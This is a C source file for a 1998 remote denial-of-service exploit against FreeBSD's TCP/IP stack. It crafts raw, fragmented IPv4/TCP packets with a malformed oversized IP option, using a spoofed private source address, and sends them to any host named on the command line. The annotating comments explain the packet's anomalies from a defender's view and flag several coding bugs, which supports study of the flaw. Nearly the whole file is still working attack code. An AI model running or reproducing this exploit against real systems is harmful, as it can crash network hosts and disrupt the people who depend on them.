Exploit code that occasionally crashes FreeBSD; exploits a TCP/IP stack flaw with a buffer overflow.
33476ecadd045d9953d5f7696cf9a509e56d2656b074b6bcb399c00cf3c9b48b
/* freebsd-mbuf-crash.c by Jeff Roberson, (jeffr@nwlink.com). Dec 11 1998.
* I'm only releasing this as an example because the bug hardly ever reliably crashes a machine.
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/ip.h>
#define __FAVOR_BSD
#include <netinet/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <strings.h>
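/*
 * Resolve HOST (a dotted quad or a hostname) to an IPv4 address in network
 * byte order.  Returns (u_long)-1 when HOST cannot be resolved.
 *
 * Caveat kept from the original contract: inet_addr() also yields INADDR_NONE
 * for "255.255.255.255", so that address is indistinguishable from failure.
 */
u_long htona(char *host)
{
	struct in_addr in;
	struct hostent *hp;

	/* Numeric form first; no resolver involved. */
	if ((in.s_addr = inet_addr(host)) != INADDR_NONE)
		return (in.s_addr);

	hp = gethostbyname(host);
	/* Only an IPv4 answer of exactly in_addr size may be copied below. */
	if (hp == NULL || hp->h_addrtype != AF_INET
	    || hp->h_length != (int)sizeof(in) || hp->h_addr_list[0] == NULL)
		return ((u_long)-1);

	/*
	 * Copy sizeof(struct in_addr) bytes.  The original copied sizeof(u_long),
	 * which on LP64 platforms reads 8 bytes from a 4-byte address entry.
	 */
	bcopy(hp->h_addr_list[0], &in, sizeof(in));
	return (in.s_addr);
}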
/*
 * Build one 124-byte raw IPv4+TCP datagram in buf, send it twice to the host
 * named on the command line, then send a shortened copy re-marked as the
 * following fragment.  The IP header goes out as written in buf (a raw
 * IPPROTO_RAW socket is used; header-include semantics presumably apply on
 * the platforms this targeted -- confirm per OS).
 *
 * From a defender's view the notable features of the packet are a 60-byte IP
 * header whose option area advertises an option length (26) that disagrees
 * with the 40 bytes actually present, fragmentation (MF set on the first
 * piece), a fixed non-local source address, and an unset TCP checksum.
 */
int main(int argc, char* argv[])
{
char buf[128];
/* IP header at offset 0, options directly after the fixed 20-byte header. */
struct ip *iph = (struct ip *)buf;
u_char *ipoptions = (u_char *)(buf + sizeof(struct ip));
/* TCP header at offset 60, matching ip_hl = 15 (15 * 4 bytes) set below. */
struct tcphdr *tcph = (struct tcphdr *)(buf + 60);
int s, i;
struct sockaddr_in sin;
if (argc != 2) {
printf("usage\n\t%s <host>\n", argv[0]);
exit(1);
}
/* Raw socket: requires privilege on every relevant OS. */
s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (s < 0) {
perror("socket");
exit(1);
}
sin.sin_family = AF_INET;
/* Port 7 is stored in sin but the packet's own TCP ports are set further down. */
sin.sin_port = htons(7);
sin.sin_addr.s_addr = htona(argv[1]);
/* htona's failure sentinel -1 converts to 0xffffffff, which is also INADDR_NONE. */
if (sin.sin_addr.s_addr == -1) {
printf("Error resolving %s\n", argv[1]);
exit(1);
}
/* Everything not assigned below stays zero, including the TCP checksum (th_sum). */
bzero(buf, sizeof(buf));
/* Header length 15 words = 60 bytes: 20 fixed + 40 bytes of options. */
iph->ip_hl=15;
iph->ip_v=4;
/* 124 = 60 (IP) + 20 (TCP) + 44 bytes of zero payload; buf has room (128). */
iph->ip_len=htons(124);
iph->ip_id= htons(getpid());
/* Offset 0 with More-Fragments set: this is the first piece of a larger datagram. */
iph->ip_off= htons(IP_MF);
iph->ip_ttl = 255;
iph->ip_p = IPPROTO_TCP;
/*
 * NOTE(review): sizeof(u_long) is 8 on LP64, so this writes past the 4-byte
 * ip_dst into ip_src.  It is masked only because ip_src is assigned on the
 * next line; the intended size is sizeof(struct in_addr).
 */
bcopy(&sin.sin_addr.s_addr, &iph->ip_dst, sizeof(u_long));
/* Source address is a fixed private (RFC 1918) address, not the sender's own. */
iph->ip_src.s_addr = htona("10.2.3.4");
/* These 20 bytes are overwritten by the assignments that follow; the loop is redundant. */
for (i = 0; i < 20;i++) {
ipoptions[i]=0xff;
}
/*
 * Option type 0xff is not a defined IP option.  Its length byte claims 26
 * bytes, yet 0xff continues through byte 38 and byte 39 is a NOP, so the
 * advertised length and the 40-byte option area disagree.  This is the
 * inconsistency a receiving stack's option parser has to bounds-check.
 */
ipoptions[0] = 0xff; /* Made up option */
ipoptions[1] = 0x1a;
memset((char *)&ipoptions[2], 0xff, 37);
ipoptions[39] = 1; /* IP_NOP */
tcph->th_sport = htons(5505);
tcph->th_dport = htons(23);
tcph->th_seq = htonl(0xabcde123);
tcph->th_ack = htonl(0x321edcba);
tcph->th_flags = TH_ACK | TH_PUSH;
tcph->th_win = htons(0x1234);
/* th_sum is never computed, so the TCP checksum on the wire is zero. */
/* sizeof(struct sockaddr) is passed rather than sizeof(sin); presumably equal here. */
if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
perror("sendto");
exit(1);
}
/* Identical first fragment sent a second time. */
if (sendto(s, buf, 124, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 124) {
perror("sendto");
exit(1);
}
/*
 * Re-mark the same buffer as the final fragment: MF clear, offset 8 units
 * (64 bytes), which follows directly after the 64 payload bytes of the
 * first piece.  Total length 80 = 60-byte header + 20 bytes of data.
 */
iph->ip_len = htons(80);
iph->ip_off = htons(8);
/* Inconsistent short-send check: 80 bytes are sent but only results below 60 are reported. */
if (sendto(s, buf, 80, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) < 60) {
perror("sendto");
exit(1);
}
/* The socket is never closed explicitly; process exit releases it. */
exit(0);
}